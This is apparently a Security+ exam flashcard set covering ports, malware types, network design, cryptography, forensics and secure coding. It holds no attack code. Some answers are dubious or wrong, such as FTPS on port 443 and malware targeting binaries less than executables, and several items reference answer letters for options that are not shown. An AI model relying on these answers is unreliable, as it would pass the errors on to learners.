Security+

Ace your homework & exams now with Quizwiz!

Which port and transport mechanism protocol must be opened on a firewall to allow incoming SFTP connections?

22 and TCP SFTP (Secure FTP) uses port 22 and rides on SSH to make connections. It uses TCP as the transport mechanism. Most secure connections of this sort require guaranteed, connection-oriented transmission of data—thus TCP. Port 21 is used by plain FTP, with no security. FTP also uses TCP as the transport mechanism. The answers listed might have appeared tricky at first, but if you know your protocols and associated port numbers and transport mechanisms used, you will prevail. Be sure to memorize Table 7-2 in the book!

Which of the following types of viruses hides its code to mask itself?

Armored An armored virus attempts to make disassembly difficult for an antivirus software program. It thwarts attempts at code examination. Stealth viruses attempt to avoid detection by antivirus software altogether. Polymorphic viruses change every time they run. Worms are not viruses.

Recently, your organization has experienced several password attacks. Management has asked you to provide additional security to ensure that this does not happen again. You decide to implement a key stretching function. Which of the following could you use?

Bcrypt PBKDF2

In the event of a short-term power loss to the server room, what should be powered on first in order to establish DNS services?

BIND server BIND stands for Berkeley Internet Name Domain. It is the most widely used DNS server on the Internet and was originally designed at the University of California at Berkeley. It normally runs on Unix systems. This would have to be booted first in order to establish DNS services; in fact, it is the only server listed that will establish DNS services in this scenario. Apache is a type of web server. Exchange is a type of e-mail server. RADIUS is an authentication server. None of these establish DNS services, unless DNS has also been loaded on those computers separately.

Which of the following is the best practice to secure log files?

Copy the log files to a server in a remote location. The best practice to securing log files is to make sure they are copied to a remote location—better yet to another server in a remote location—where they can be easily accessed if the original server fails. This remote location should be in another city, not across the street in another building. Logging all failed and successful login attempts can create gigantic log files, the kind that might be impossible to manage. Most organizations will not do this. Increasing the size of log files won't necessarily secure them, but it is a good idea when it comes to the management of log files. The default size of log files in most operating systems is not large enough for today's big organizations. The hashing of log files is a good idea when securing the log files so that integrity can be maintained, but it is not necessarily the best practice. It should be used in conjunction with copying the files to a secure location.

Which of the following is most likely to result in data loss?

Developers copying data from production to test environments with USB sticks By default, if data is copied to a USB stick, it is not encrypted. There is virtually no security in this scenario, and the worst part is that the USB sticks are physically traveling from one department to another. To rectify the situation, the developers could consider using AES-256 to encrypt the data on the USB flash drives. The accounting personnel are using SFTP, the backup tapes are encrypted, and the back office staff is using SSH. All these other scenarios at least have some kind of security in mind.

Which of the following security technologies should you provide to allow users remote access to your network?

Firewall VPN A firewall can be used in conjunction with a virtual private network (VPN) service to allow users remote access to your network. The firewall might incorporate the VPN, or the VPN might be controlled by a separate server or concentrator. Subnetting is not necessary for remote access, but it is a security method used to compartmentalize networks. Network address translation (NAT) is used to translate LAN addresses through to the Internet. Network access control (NAC) is used to authenticate computers and users in a secure fashion on the LAN.

An attacker has identified and exploited several vulnerabilities in a closed-source application that your organization has developed. What did the attacker implement?

Fuzzing Fuzzing (fuzz testing) is the automated insertion of random data into a computer program. It is used to find vulnerabilities by the people who developed the program and by attackers. Secure code review is the analysis of source code by authorized individuals in an attempt to find problems and security issues. Vulnerability testing is a scan done on computers and networks to find their vulnerability level. Compiling is the transformation of source code, generally done to create executable programs.

James wants to set up a VPN connection between his main office and a satellite office. Which protocol should he use?

IPsec IPsec is used to secure VPN connections (such as L2TP tunnels). 802.1X specifies port-based network access control (NAC). RDP is the Remote Desktop Protocol. Telnet is used to remotely connect to other computers and routers, but it is insecure and deprecated and is not used in VPNs.

You are aware that any system in the demilitarized zone (DMZ) can be compromised because the DMZ is accessible from the Internet. What should you do to mitigate this risk?

Implement every computer on the DMZ as a bastion host. You should implement every computer on the demilitarized zone (DMZ) as a bastion host because any system on the DMZ can be compromised. A bastion host is, in essence, a system that is hardened to resist attacks. A bastion host is not attached to any firewall software. However, every firewall should be hardened like a bastion host.

What is MAC filtering a form of?

NAC MAC filtering occurs when only a select list of MAC addresses is allowed to communicate with an AP or router. This is an example of network access control (NAC), a way of controlling how computers connect to the network in a secure fashion. VPN stands for virtual private network, which allows for the secure remote connection of computers to a network. NAT stands for network address translation, which takes care of the connection from LAN clients through a router and out to the Internet. A DMZ is a demilitarized zone, a place separate from the LAN where servers reside that can be reached by users on the Internet.

You have been given the task of scanning for viruses on a PC. What is the best of the following methods?

Recovery Environment You should use a recovery environment. Most often, this would be the one built into Windows. Many manufacturers suggest using this, and more specifically Safe Mode. However, it could also be a Linux rescue disc or flash drive. That's not a true dual-boot though. An actual dual-boot is when Windows and Linux are both installed to the hard drive. Command Prompt only is not enough, nor is it necessary for some virus scanning scenarios. Booting into Windows normally is tantamount to doing nothing. Remember to use a recovery environment when scanning for viruses.

Which protocol is based on SSH?

SFTP SFTP is the SSH File Transfer Protocol (also called Secure FTP). It is an extension of the SSH protocol, which uses port 22. Contrast SFTP with FTPS. FTPS is FTP Secure or FTP-SSL, which uses port 443. Plain FTP has no built-in security and is not based on SSH. TFTP is a simple version of FTP.

Your company needs to protect message integrity. Management decides that you need to implement an algorithm that uses 160-bit checksums. Which algorithm should you implement?

SHA The Secure Hashing Algorithm (SHA) produces 160-bit checksums. The purpose of SHA is to protect message integrity. There are several versions of SHA that have been produced since the first 160-bit version.Answers A, B, and C are incorrect. The Advanced Encryption Standard (AES) uses 128-bit, 192-bit, and 256-bit encryption keys. The MD5 algorithm produces 128-bit checksums, and Data Encryption Standard (DES) uses 56-bit encryption keys.

You are responsible for managing the security for a network that supports multiple protocols. You need to understand the purpose of each of the protocols that are implemented on the network. Drag the protocol to its description.

SSH: A protocol that uses a secure channel to connect a server and a client SSL: A protocol that secures messages between the Application and Transport layer SCP: A protocol that allows files to be copied over a secure connection ICMP: A protocol used to test and report on path information between network devices

Which of the following misuses the Transmission Control Protocol handshake process?

SYN attack

flod guard

Security feature implemented on some firewalls to protect against SYN floods and other flooding attacks. Also known as an attack guard.

Which of the following ports is required by an e-commerce web server running SSL?

Port 443 inbound The web server needs to have inbound port 443 open to accept secure requests for SSL sessions from clients. The outbound port doesn't actually matter; it's the inbound port that is important for the server. Inbound port 80 is used by default for regular HTTP connections.

What should be incorporated with annual awareness security training?

Signing of a user agreement Security awareness training should be coupled with the signing of a user agreement. This agreement states that the user acknowledges and accepts specific rules of behavior, conduct, and nondisclosure of the training. Some organizations might add other policies that the user must agree to as well. Security controls deal with the proper implementation of a security plan. User rights and permissions reviews are part of security audits. Succession planning is the process of developing and readying new servers and other equipment if the current equipment fails, is compromised, or becomes outdated.

Whitelisting, blacklisting, and closing open relays are all mitigation techniques addressing what kind of threat?

Spam Closing open relays, whitelisting, and blacklisting are all mitigation techniques that address spam. Spam e-mail is a serious problem for all companies and must be filtered as much as possible.

Which of the following statements best describes a static NAT?

Static NAT uses a one-to-one mapping

PKI Components

Wildcard:Reduces the certificate management burden by allowing one certificate to be used for multiple subdomains OCSP: Checks online certificate status in real time CSR: Messages sent from a user or application to a CA to apply for a digital certificate CRL: Contains a list of certificates that have been issued and subsequently rescinded by a given CA Keep in mind that OCSP is used to validate whether trust is in place and accurate by returning responses of good, unknown, or revoked.

Defense in Depth

The building up and layering of security measures that protect data from inception, on through storage and network transfer, and lastly to final disposal.

You are in charge of recycling computers. Some of the computers have hard drives that contain personally identifiable information (PII). What should be done to the hard drive before it is recycled?

The hard drive should be sanitized. Before a hard drive is recycled, it should be sanitized. Also known as purging, sanitizing is the removal of data in such a way that it cannot be reconstructed by any known technique. At this point the drive can be recycled within the organization or recycled with the rest of the computer. Reformatting the drive is not enough because reformatting leaves data remanence, or data residue. Destroying the drive can render it useless and therefore cannot be recycled. Storing the drive in a safe area is not recycling the drive.

NAT

The process of changing an IP address while it is in transit across a router. This is usually implemented so that one larger address space (private) can be remapped to another address space, or single IP address (public).

domain name kiting

The process of deleting a domain name during the five-day grace period (known as the add grace period, or AGP) and immediately reregistering it for another five-day period to keep a domain name indefinitely and for free.

What are the best reasons to use an HSM?

To generate keys To store keys An HSM (hardware security module) is a device that manages digital keys for cryptography. It allows for onboard secure storage of data and is used to generate and store keys. Key recovery and the transferring of keys is done by other methods. Although an HSM can be used in conjunction with a PKI, it does not have the option of storing a CRL.

You have been tasked with segmenting internal traffic between layer 2 devices on the LAN. Which of the following network design elements would most likely be used?

VLAN You would most likely use a virtual LAN (VLAN). This allows you to segment internal traffic within layer 2 of the OSI model, by using either a protocol-based scheme or a port-based scheme. The DMZ is used to create a safe haven for servers that are accessed by outside traffic. NAT is network address translation, which is a layer 3 option used on routers. Because we are dealing with a layer 2 scenario, routing in general is not necessary.

You have received several reports from users of corrupted data. You patched the affected systems but are still getting reports of corrupted data. Which of the following methods should you use to help identify the problem?

Vulnerability scan If the data is becoming corrupted more than once even after an update to the affected systems, you should perform a vulnerability scan to find out what the possible threats and vulnerabilities are to those systems. A data integrity check would simply tell you that the data has been corrupted and, therefore, that integrity is not intact. Penetration testing determines whether a system can be compromised by exploiting a particular threat. A hardware baseline review will tell you how your hardware is performing and how secure it is compared to the last baseline. Baselines are examples of vulnerability assessments, but in this case you need a software-based vulnerability assessment.mark

You have identified a security threat on a server, but you have decided not to exploit it. What method have you implemented?

Vulnerability scan Vulnerability scans will identify threats but not exploit them the way a penetration test might. Nothing has been mitigated in this scenario, only identified. A NIDS (network intrusion detection system) will detect malicious traffic on the network but will not find security threats on a server.

static NAT

When a single private IP address translates to a single public IP address. This is also called one-to-one mapping.

fail-open mode

When a switch broadcasts data on all ports the way a hub does.

one-to-one mapping

When an individual certificate is mapped to a single recipient.

null session

When used by an attacker, a malicious connection to the Windows interprocess communications share (IPC$).

You discover that an investigator made some mistakes during a recent forensic investigation. You need to ensure that the investigator follows the appropriate process for the collection, analysis, and preservation of evidence. Which term should you use for this process?

chain of custody Chain of custody refers to strict and organized formal procedures in accordance with the law and the legal regulations governing the collection, analysis, and preservation of the evidence before the evidence is produced in a court of law. In computer crimes, most of the evidence is electronic in nature and is referred to as hearsay evidence. Therefore, it is important that a clearly defined chain of custody be established to ensure the reliability and the integrity of the evidence and to make the evidence admissible in court. Chain of custody assists in identifying whether a system was properly handled during transport.Chain of custody guarantees the identity and integrity of the evidence from the collection stage to its presentation in the court of law. The following procedure is used to establish a chain of custody for evidence submission in a court: The evidence should be collected in the predefined manner by following strict and formal procedures and stating the names of people who secured the evidence and validated it. The evidence should be marked by the investigating officer by mentioning the date, the time, and the respective case number. The evidence is sealed in a container, and the container is again marked with the same information. Writing the information on the seal is preferred because it is easier to detect any change to the evidence by examining either the broken or the tampered seal. The location of the evidence is also documented. The evidence is processed and analyzed by technical experts. Logs are maintained mentioning people who accessed the information, the time at which the information was accessed, and the reasons for accessing the information. The prosecuting lawyer presents the evidence in the court of law to implicate the suspect. Chain of custody applies to forensic image retention in that the chain of custody provides documentation as to who handled the evidence.When performing a forensic investigation, you should ensure that the following procedures are followed: Follow order of volatility rules. - All data is volatile. More rapidly changing information should be preserved first, in this order: CPU, cache and register content; Routing table, ARP cache, process table, kernel statistic; Memory; Temporary file system / swap space; Data on hard disk; Remotely logged data; Data contained on archival media. Capture a system image. - Ensure that appropriate forensic hashes are taken of the disk both before and after the image is taken and of the image itself. Get copies of both a network traffic capture and logs. Ensure that the correct record time offset is obtained to ensure that any recordings can be calibrated together. Takes hashes of all files and images. Record the appropriate screenshots. Record any witnesses, including contact information. Keep track of man hours and expense involved in the forensic process. Obtain and preserve any video capture that exists, including computer video and CCTV. Perform big data analysis. - It is vital that your organization's data is not corrupted. For this purpose, you need software in place to help you analyze the data. Remember, your organization is responsible for protecting the data. During any breach or security-related event, it is important to ensure that damage loss and control is a primary concern during the incident response. For this reason, a damage loss and control plan should be developed to ensure that further damage is not caused or allowed during an incident response. A first responder should be identified for each type of incident to ensure that proper procedures are followed. This first responder should be familiar with all incident response plans.Remember in incident response that you must consider the incident time offsets. For example, if the incident response team has received an e-mail alert saying that a certain event occurred, it usually gives the IP address where the attack occurred and time of the occurrence. Then, when the team analyzes the log for the affected computer, they might not be able to determine the offender if they do not factor in incident time offsets. In most server logs, you may only get login and logout entries. You will then need to use the login and logout times to determine who was logged in to the server at the time the incident occurred. This will at least give the team a starting point for determining who the attacker was.

Your organization has decided to implement an encryption algorithm to protect data. One IT staff member suggests that the organization use IDEA. Which strength encryption key is used in this encryption algorithm?

128-bit International Data Encryption Algorithm (IDEA) uses a 128-bit encryption key to encrypt 64-bit blocks of data. Data Encryption Standard (DES) uses a 56-bit key to encrypt 64-bit blocks of data. Some private key encryption standards support 256-bit encryption keys.

cloud computing

A way of offering on-demand services that extend the capabilities of a person's computer or an organization's network.

replay attack

An attack in which valid data transmission is maliciously or fraudulently repeated or delayed.

DNS amplification attack

An attack that initiates a DNS request with a spoofed source address. Responses (which are larger than the request) are sent to the victim server in an attempt to flood it.

CVE common vulnerabilities and exposures

An online list of known vulnerabilities (and patches) to software, especially web servers. It is maintained by the MITRE Corporation.

Which of the following fire extinguishers should be used to put out magnesium- or titanium-based metal fires?

Class D fire extinguishers are the type used for combustible metal fires such as ones that can burn magnesium, titanium, and lithium. They are designated with a yellowed decagon.

There is an important upcoming patch to be released. You are required to test the installation of the patch a dozen times before the patch is distributed to the public. What should you perform to test the patching process quickly and often?

Create a virtualized sandbox and utilize snapshots You should create a virtualized sandbox—a place where you can work with many virtualized images and test them frequently. By utilizing snapshots, you are taking limited images of the systems at a specific point, most likely before and after the patch installation. The snapshot is a set of information at a particular point in time, and not necessarily an entire image.Creating a single image of a patched PC is not enough. Good patch management requires that the security administrator do thorough testing; in the scenario you are required to test the patch a dozen times. Incremental backups are used as a part of an efficient backup plan that usually includes incremental and full backups. But this—and the fact that the PC is unpatched—does not help a security administrator to test the patching process quickly and often. A full disk image after each patch installation could be very time consuming. Instead, snapshots are the better option.

Drag the Web Site application code attack type to its mitigation.

Cross-site request forgery (CSRF): Validate both the client and server side. Cross-site scripting (XSS): Implement input validation. Session hijacking: Encrypt communications between the two parties. Malicious add-ons: Implement application white-listing.

You have found vulnerabilities in your SCADA system. Unfortunately, changes to the SCADA system cannot be made without vendor approval, which can take months to obtain. Which of the following is the best way to protect the SCADA system in the interim?

Deploy a NIPS at the edge of the SCADA network The only answer that does not require modifications to the actual SCADA (supervisory control and data acquisition) system and network is to deploy a NIPS (network intrusion prevention system) at the edge of the SCADA network. This will monitor for (and protect against) attacks on the SCADA system, but does not require that the SCADA system be modified. Installing a firewall, updating AV definitions, and enabling auditing all require modifications to the SCADA system and network. While you wait for testing to be completed and obtain vendor approval, these avenues should be explored, but not implemented.

Users are complaining that the new biometric identification system is difficult to use. They are saying that even though the initial login worked fine, they have difficulty logging in later. In addition to user training, what should you investigate?

FRR You should investigate the device's FRR to determine its accuracy. False rejection rate (FRR) measures how likely it would be that an authorized user is denied access to the system. Expressed as a ratio, it is the number of authorized users who were denied access to the protected system divided by the number of authentication attempts. False rejections can occur if the system settings are too precise, or if users are not trained properly on biometric login procedures. By contrast, false acceptance rate (FAR) measures how likely it would be that an unauthorized user is granted access to the system. Its ratio is the number of unauthorized users who were incorrectly allowed access to the protected system divided by the number of authentication attempts. FAR could happen because the system was not precise enough when matching the authorized user.Crossover error rate (CER) is the point where FAR and FRR are equal. Generally, a lower CER value would indicate a more accurate system. CER is primarily used to compare biometric authentication systems. HOTP/TOTP are two types of one-time passwords, (i.e., they can only be used once). Hashed One Time Passwords (HOTP) are secure passwords used with hardware tokens. Time-based One Time Passwords (TOTP) are issued for a specific period of time. Once used, or once the time expires, the TOTP is no longer valid.Other considerations include ABAC, proximity cards, smartcards, tokens, CAC, PIV, and file security.Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons. Another aspect would be if a user has read access to files, but is attempting to edit or delete files remotely. Smartcards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner. As an example, if the user has access to a highly secure area by using the smartcard, a thief would have the same access when using the stolen card. Proximity cards are a type of smartcard that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is with range of the proximity card, and the information transmitted is correct, authentication is granted. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. A Common Access Card (CAC) is a smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login.A Personal Identity Verification (PIV) smart card is issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes and a magnetic strip. They can be used for visual identification and for login.File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.

Which of the following security actions should be completed before a user is given access to the network?

Identification and authentication Before users are given access to a network, they need to identify themselves in one or more ways and be authenticated via whatever system is in place. After they are given access to the network, they can later be authorized to individual resources. The authentication step cannot be skipped.

Which type of vulnerability is demonstrated by buffer overflows?

Improper input handling A buffer overflow is an example of improper input handling, and the impact can include crashing the application. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, proper date ranges.Answer B is incorrect. Improper error handling could allow an attacker to crash a program. Error checking should be built into every module or code function. An error should not result in a crashed application, but rather generate an error message. Answers C and D are incorrect. Misconfiguration or weak configuration can have a severe impact. For example, a user who (for convenience) selects weak or minimal security settings on a browser may impact the security of the entire organization. Misconfiguration, such as not changing the administrative user name or password, can also have a significant impact. Systems and components, such as routers, should never be deployed with the default configuration enabled. As an example, many SOHO users are thrilled that they got their new wireless network to finally communicate "out of the box." As a result, they do not change the default administrator information, leaving their network wide open for attack.

Which of the following programming techniques can stop buffer overflow attacks?

Input validation Input validation is the best programming technique to stop buffer overflow attacks and is also used to prevent SQL injection attacks. A SQL injection attack is a code injection technique where SQL statements are inserted into fields of an application. A sandbox is used to run the web scripts in their own testing environment. Backdoors are used in computer programs to bypass normal authentication. Backdoor analysis includes checking the operating system, applications, and firmware on devices and making sure they are updated.

Which of the following is a step in deploying a WPA2-Enterprise wireless network?

Install a digital certificate on the authentication server If you are running a WPA2-Enterprise wireless network, then the wireless access point (WAP) will need to access a RADIUS server for the authentication portion of the wireless connection. This scenario calls for a digital certificate to be loaded on the RADIUS server. A DHCP server might be utilized at the WAP (or other all-in-one network device), or there could be a separate DHCP server, but this is a different task altogether that the RADIUS server is not normally responsible for. The RADIUS server needs a digital certificate; the encryption key for WPA2 would be stored on the WAP. A token is not necessary, but is often used with swipeable smart cards for physical authentication.

NTLM is for the most part backward compatible and is an improved version of which of the following?

LANMAN LANMAN is an outdated hash used in Windows; it is the original hash used to store passwords. The NTLM (and the newer NTLMv2) hash is used in newer versions of Windows to replace LANMAN. AES is the Advanced Encryption Standard, a popular encryption method. MD5 is a different hash function used in the downloading of files, among other things. Passwd is a text-based file used in Linux that stores user information and permissions.

PAT

Like NAT, but it translates both IP addresses and port numbers.

You and several others on the IT team are deciding on an access control model. The IT director wants to implement the strictest access control model available, ensuring that data is kept as secure as possible. Which of the following access control models should you and your IT team implement?

Mandatory access control Mandatory access control (MAC) is the strictest access control model listed in the answers. It is a well-defined model used primarily by the government. It uses security labels to define resources. In the discretionary access control (DAC) model, the owner decides which users are allowed to have access to objects; it is not as strict as MAC. Role-based access control (RBAC) is an access model that, like MAC, is controlled by the system but differs from MAC in the way permissions are configured; it is not as strict as MAC.

Which of these vulnerabilities is characterized by a user modifying a browser's security settings to make it more convenient to visit web sites?

Misconfiguration/weak configuration If a user modifies a browser's security settings to make it more convenient to visit web sites, such as turning off pop-up blockers and anti-phishing controls, this is an example of weak configuration. Misconfiguration and weak configuration can have a severe impact on the entire organization. Misconfiguration, such as not changing the default administrative user name or password, can also have a significant impact.Answer D is incorrect. An SQL injection is an example of improper input handling, and the impact can include data destruction or unfettered access to the database. Inputs should be checked for common SQL injection symbols. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges.Answer A is incorrect. Improper error handling could allow an attacker to crash a program. Error checking should be built into every module or code function. An error should not result in a crashed application, but rather generate an error message. Answer B is incorrect. Systems and components, such as routers, should never be deployed with the default configuration enabled. As an example, many SOHO users are thrilled that they got their new wireless network to finally communicate "out of the box." As a result, they do not change the default administrator information, leaving their network wide open for attack.

Which of the following will identify a Smurf attack?

NIDS A NIDS (network intrusion detection system) is designed to identify network attacks such as a Smurf attack (a type of DoS). Firewalls can block particular packets or IP addresses, but they don't identify actual attacks. Content filters are used to secure users' web browsing sessions, filtering out unwanted websites. Load balancers are used to distribute workload among multiple servers.

You are configuring security for a network that is isolated from the Internet by a perimeter network. You need to test the network's ability to detect and respond to a DoS attack. What should you implement?

Pen testing Penetration testing is required in this scenario. The only way to simulate a denial of service (DoS) attack is to actively test the network with a penetration test of your own design. All of the other methods are passive attempts at testing the network. A vulnerability scan is generally considered to be the most passive (or least invasive) of the answers. A port scan is fairly passive as well; it only identifies open ports and does not attempt to access those ports any further. Network packet analysis is a bit more active in that it will allow you to disassemble packets coming from the source; however, it does not actively solicit new information or make new connections to the host as a penetration test will.

Which of the following methods is the most closely associated with DLL injection?

Penetration testing is the method most closely associated with DLL injection, which is a technique used to run code within the address space of another process by forcing it to load a dynamic link library. It is used to influence the behavior of a program in a way that the creator of the program did not intend. This type of injection can be incorporated into the Registry in Windows. Penetration testing is a type of active security analysis used to find out if DLL injection attempts will work.The other three answers are not active security and analyses; they are passive. Vulnerability assessment can find open ports and define the threats associated with those ports. Performance monitoring can analyze a server's resources such as CPU and RAM. Auditing is making a technical assessment of applications, systems, and networks. Auditing often includes reviewing security logs, vulnerability scans, performance logs, and policies.

Tara has written an application and is ready to go through the hardening process. Which of the following could be considered a hardening process of the SDLC?

Secure coding concepts Secure coding concepts such as input validation will help to harden an application within the systems development life cycle (SDLC). Although disabling unnecessary services and accounts and patching the application are important, these could all be considered application or server hardening, not hardening within the SDLC.

NAC-network access control

Sets the rules by which connections to a network are governed.

You have been asked to implement the encryption standard that is used in the Clipper Chip. Which encryption standard should you use?

Skipjack Skipjack is a private key encryption standard that was developed by the U.S. government for the Clipper Chip. Skipjack uses an 80-bit key, which might soon be vulnerable to decryption by hackers. Advanced Encryption Standard (AES) is a newer encryption standard that uses the Rijndael algorithm with 128-bit, 192-bit, or 256-bit keys. AES256 is stronger than DES, 3DES, SHA, or RC4. Blowfish is a private key encryption algorithm that was developed for optimal performance on 32-bit central processing units (CPUs). Blowfish supports keys up to 448 bits in length. Data Encryption Standard (DES) is an older private key encryption algorithm that was developed by IBM in the 1970s. DES uses 56-bit encryption keys on 64-bit data blocks.

Your users often forget their passwords and ask for assistance. You send a link to reset the password. You would like to incorporate a time limit for the user to respond to the link. Which would you incorporate?

TOTP Time-based One Time Passwords (TOTP) are issued for a specific period of time. Once it is used or its time expires, the TOTP is no longer valid. HOTP and TOTP are both types of one-time passwords, (i.e., they can only be used once). Answer D is incorrect. Hashed One Time Passwords (HOTP) are secure passwords used with hardware tokens. Answer C is incorrect. Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons. Another aspect would be if a user has read access to files, but is attempting to edit or delete files remotely. Answer B is incorrect. False rejection rate (FRR) is one way to measure the accuracy of a biometric authentication system. It measures how likely it would be that an authorized user is denied access to the system. Expressed as a ratio, it is the number of authorized users who were denied access to the protected system divided by the number of authentication attempts. False rejections can occur if the system settings are too precise, or if users are not trained properly on biometric login procedures. By contrast, false acceptance rate (FAR) measures how likely it would be that an unauthorized user is granted access to the system. Its ratio is the number of unauthorized users who were incorrectly allowed access to the protected system divided by the number of authentication attempts. FAR could happen because the system was not precise enough when matching the authorized user. Crossover error rate (CER) is the point where FAR and FRR are equal. Generally, a lower CER value would indicate a more accurate system. CER is primarily used to compare biometric authentication systems. Other considerations include proximity cards, smartcards, tokens, CAC, PIV, and file security.Smartcards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner. As an example, if the user has access to a highly secure area by using the smartcard, a thief would have the same access when using the stolen card. Proximity cards are a type of smartcard that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is with range of the proximity card, and the information transmitted is correct, authentication is granted. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. A common access card (CAC) is a smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes and a magnetic strip. They can be used for visual identification and for login.A Personal Identity Verification (PIV) smart card is issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes and a magnetic strip. They can be used for visual identification and for login. File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.

Which of the following protocols does the 802.11i standard support?

TKIP AES AES (Advanced Encryption Standard) and TKIP (Temporal Key Integrity Protocol) are supported by the 802.11i standard, which deals with wireless transmissions. RSA deals with the encrypting of data through the use of tokens. ECC (elliptic curve cryptography) and DES are also used to encrypt data.

measured boot

Takes measurements of the secure boot process, signs those results with a TPM, and reports those measurements to a trusted third party such as a remote attestation service.

VLAN hopping

The act of gaining access to traffic on other VLANs that would not normally be accessible by jumping from one VLAN to another.

war-dialing

The act of scanning telephone numbers by dialing them one at a time and adding them to a list, in an attempt to gain access to computer networks.

You are a security administrator for a midsized company that uses several applications on its client computers. After the installation of a specialized program on one computer, a software application executed an online activation process. Then, a few months later, the computer experienced a hardware failure. A backup image of the operating system was restored on a newer revision of the same brand and model computer. After that restoration, the specialized program no longer works. Which of the following is the most likely cause of the problem?

The hash key summary of the hardware and the specialized program no longer match. Some software activations are based on a hardware key, or a hardware key and a software key that are compared. The key is normally a hash value (computed with either MD5 or SHA-256, for instance), and if the hash values don't match, then the specialized program won't be able to execute the online activation process, which is required because the image was restored to the new computer (with a new and different key). This of course is the most likely cause, but not the only possible reason for why the specialized program stopped functioning. If the image file to be restored was encrypted with the wrong key, then you wouldn't be able to complete the restoration, and the computer would not function. In trusted computing, remote attestation is when a client computer authenticates its hardware and software configuration to a remote server with the goal being to determine the level of trust—often using a PKI. Remote attestation might indeed be failing, but it is less likely being caused by blocked ports. The software configuration of the affected computer should not have changed, even after the restoration. Plus, the scenario doesn't mention any network changes, so the configuration of ports, ACLs, and so on should be the same. The least likely answer is that the binary files of the specialized program have been modified by malware. Malware can target binary files, but it is less common compared to other types of files such as executables. Many application developers will protect their binary files with transport layer security encryption, making them difficult (if not impossible) to modify.

You are contracted with a customer to protect its user data. The customer requires the following: Easy backup of all user data Minimizing the risk of physical data theft Minimizing the impact of failure on any one file server

Use file servers with removable hard disks. Secure the hard disks in a separate area after hours. Using file servers with removable hard disks is the best answer. All the other answers do not offer easy backup of user data. The time it would take to use separate USB hard disks makes it anything but easy. The idea of locking entire servers in a secure area doesn't sound easy either. However, securing removable hard disks in a separate area seems like an easy way to implement the solution. It should also minimize the risk of physical data theft because the hard disks are stored in a secure area. Using multiple file servers should minimize the impact of failure on any one file server.

Which of the following can be implemented in hardware or software to protect a web server from XSS attacks?

WAF A WAF (web application firewall) can be implemented as hardware or software. Among other things it can protect from XSS (cross-site scripting) and SQL injection attacks. The WAF can be an appliance, server software, or plug-in, and applies a set of rules to HTTP sessions to protect from various attacks. WebKnight and ModSecurity are examples of open source WAFs. Unlike other devices such as network intrusion detection systems (NIDSs), routers, and some firewalls, the WAF operates at layer 7 of the OSI model (application layer).A flood guard is a separate feature of firewalls that can protect against SYN flood attacks. IDS stands for intrusion detection system—a device or software that monitors network activities and alerts an administrator to various types of malicious activities. A URL content filter is a software filter that monitors for specific URLs (domain names and website names) that are undesirable and disallows access to them.

Which type of malware does not require a user to execute a program to distribute the software?

Worm

Your company's network has multiple networks that are connected via different devices. Which device is designed to provide the most efficient transmission of traffic that is NOT specifically denied between networks?

a router A router is a device that is designed to transmit all data that is not specifically denied between networks, and to do so in the most efficient manner possible. A router enables connectivity between two or more networks and can connect multiple network segments into one network. Answers C, D, and A are incorrect. A firewall is a mechanism that is designed to deny transmission of data that is not specifically allowed. For example, a firewall can be configured to ensure that messages on a TCP/IP subnet stay local to the subnet. Additionally, a firewall can be used to restrict access to a private network from the Internet. A hub and a repeater are central network connection devices that are designed to transmit data between computers on the same subnet. Hubs and repeaters are not used to transmit data between subnets.

You collect evidence after an attack has occurred. You need to ensure that the evidence collected follows chain of custody procedures. Which stage is NOT a part of the life cycle of evidence?

accredition Accreditation is not a part of the life cycle of evidence. Accreditation is the process in which the management accepts a system's functionality and assurance. Accreditation represents the satisfaction of management regarding the adequacy of the product with respect to functionality and assurance after the evaluation process is over.The stages in the life cycle of the evidence or the chain of custody are as follows: collection of evidence from the site analysis of the evidence by a team of experts storage of the evidence in a secure place to ensure that the evidence is not tampered with presentation of the evidence by legal experts in a court of law returning the evidence to the owner after the proceedings are over Most computer-related evidence is hearsay in nature and can be easily dismissed in court due to its volatile nature. Strict and organized procedures should be followed for collection, analysis, and handling of evidence.

Which of the following secure coding techniques protects against injection attacks?

stored procedures Stored procedures are series of SQL statements that are executed as a group, and are similar to scripts. Using properly written stored procedures protects the database from damage caused by poorly written SQL statements and SQL injection attacks.The purpose of an SQL injection attack is to read sensitive data from the database, modify the data, execute administrative operations on the database, recover the content of a given file, and even issue commands to the operating system.Answer D is incorrect. Obfuscation and camouflage are closely related. Obfuscation means to make something difficult to understand, and camouflage means to hide something among its surroundings and make it more difficult to detect. The purpose of both is to make it more difficult for someone to tamper with code or reverse engineer the code, but they will not protect against injection attacks.Answer C is incorrect. Error handling means that every input is validated against a range of acceptable values. If the input does not match that range of values, that input rejected, and an error message is generated. Program crashes occur in when an invalid input produces unexpected results. SQL injection attacks usually do not result in errors, so error handling would not fix them.Answer B is incorrect. Provisioning and deprovisioning allocate resources based on demand for those resources. They will not protect against injection attacks.Other secure coding techniques and issues include encryption, code signing, code reuse, dead code, server-side versus client-side execution and validation, memory management, third-party SDKs, and data exposure.Encryption should be used in software development, as well as network traffic, to protect data being stored or transmitted.Code signing embeds a digital signature into a piece of software, and is often used with device drivers. Validating the signature would ensure 